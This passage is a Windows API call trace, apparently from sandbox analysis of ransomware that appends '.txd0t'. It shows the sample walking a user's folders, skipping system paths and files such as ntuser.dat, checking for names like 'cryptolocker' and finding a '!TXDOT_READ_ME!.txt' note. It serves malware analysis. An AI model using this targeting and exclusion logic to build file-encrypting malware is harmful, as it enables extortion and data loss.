returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav.txd0t" [0119.854] PathFindExtensionW (pszPath="uUCd01DT4yfQz.wav.txd0t") returned=".txd0t" [0119.854] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.854] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599e8e0 | out: lpFindFileData=0x599e8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x521649ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x6777, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav.txd0t", cAlternateFileName="UUCD01~1.TXD")) returned 0 [0119.855] FindClose (in: hFindFile=0xec1ab0 | out: hFindFile=0xec1ab0) returned 1 [0119.855] GetProcessHeap () returned 0xe30000 [0119.855] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0119.855] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 0 [0119.855] FindClose (in: hFindFile=0xec1a70 | out: hFindFile=0xec1a70) returned 1 [0119.855] GetProcessHeap () returned 0xe30000 [0119.855] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.855] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0x524877ee, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524877ee, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 0 [0119.855] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.855] GetProcessHeap () returned 0xe30000 [0119.855] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.855] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0119.855] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0119.855] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0119.855] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0119.855] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0119.855] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0119.855] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x6c4d382c, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6c4d382c, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0119.855] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0119.855] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0119.855] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.855] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.855] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="NTUSER.DAT", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\NTUSER.DAT") returned="C:\\Users\\FD1HVy\\NTUSER.DAT" [0119.855] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0119.855] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0119.855] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0119.855] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0119.855] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0119.855] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0119.855] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0119.856] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0119.856] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0119.856] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0119.856] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0119.856] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0119.856] StrCmpW (psz1="ntuser.dat.LOG1", psz2=".") returned 1 [0119.856] StrCmpW (psz1="ntuser.dat.LOG1", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0119.856] StrCmpW (psz1="ntuser.dat.LOG2", psz2=".") returned 1 [0119.856] StrCmpW (psz1="ntuser.dat.LOG2", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0119.856] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0119.856] StrCmpW (psz1="ntuser.ini", psz2=".") returned 1 [0119.856] StrCmpW (psz1="ntuser.ini", psz2="..") returned 1 [0119.856] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0119.856] StrCmpW (psz1="OneDrive", psz2=".") returned 1 [0119.856] StrCmpW (psz1="OneDrive", psz2="..") returned 1 [0119.856] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.856] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.856] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="OneDrive", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0119.856] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0119.856] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.856] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0119.856] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\boot\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\programdata\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\drivers\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\wsus\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="crypt_detect") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="cryptolocker") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="ransomware") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\WINDOWS") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.857] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\OneDrive", lpSrch="C:\\Program Files") returned 0x0 [0119.857] GetProcessHeap () returned 0xe30000 [0119.857] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.857] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\OneDrive", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive") returned="C:\\Users\\FD1HVy\\OneDrive" [0119.857] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\OneDrive", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\OneDrive\\*") returned="C:\\Users\\FD1HVy\\OneDrive\\*" [0119.857] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec19b0 [0119.866] StrCmpW (psz1=".", psz2=".") returned 0 [0119.866] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd4516574, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x94022772, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.866] StrCmpW (psz1="..", psz2=".") returned 1 [0119.866] StrCmpW (psz1="..", psz2="..") returned 0 [0119.866] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0119.866] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0119.867] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0119.867] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3f0f0bc5, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3f0f0bc5, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x93ef127a, ftLastWriteTime.dwHighDateTime=0x1d39f5d, nFileSizeHigh=0x0, nFileSizeLow=0x61, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.867] FindClose (in: hFindFile=0xec19b0 | out: hFindFile=0xec19b0) returned 1 [0119.867] GetProcessHeap () returned 0xe30000 [0119.867] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.867] FindNextFileW (in: hFindFile=0xec1bb0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0119.867] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0119.867] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0119.867] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0119.867] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0119.867] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Pictures", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\system\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\local\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\boot\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\perflogs\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\programdata\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\drivers\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\wsus\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="crypt_detect") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="cryptolocker") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="ransomware") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\WINDOWS") returned 0x0 [0119.867] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.868] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Pictures", lpSrch="C:\\Program Files") returned 0x0 [0119.868] GetProcessHeap () returned 0xe30000 [0119.868] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xef3600 [0119.868] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.868] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\*") returned="C:\\Users\\FD1HVy\\Pictures\\*" [0119.868] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1a70 [0119.868] StrCmpW (psz1=".", psz2=".") returned 0 [0119.868] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x529f2e0f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x529f2e0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.868] StrCmpW (psz1="..", psz2=".") returned 1 [0119.868] StrCmpW (psz1="..", psz2="..") returned 0 [0119.868] FindNextFileW (in: hFindFile=0xec1a70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524613ac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x524613ac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x524ffa54, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.868] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.868] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.868] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Pictures", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures") returned="C:\\Users\\FD1HVy\\Pictures" [0119.868] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures", psz2="\\", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\") returned="C:\\Users\\FD1HVy\\Pictures\\" [0119.868] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Pictures\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt" [0119.868] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.868] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.868] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.868] StrCmpIW 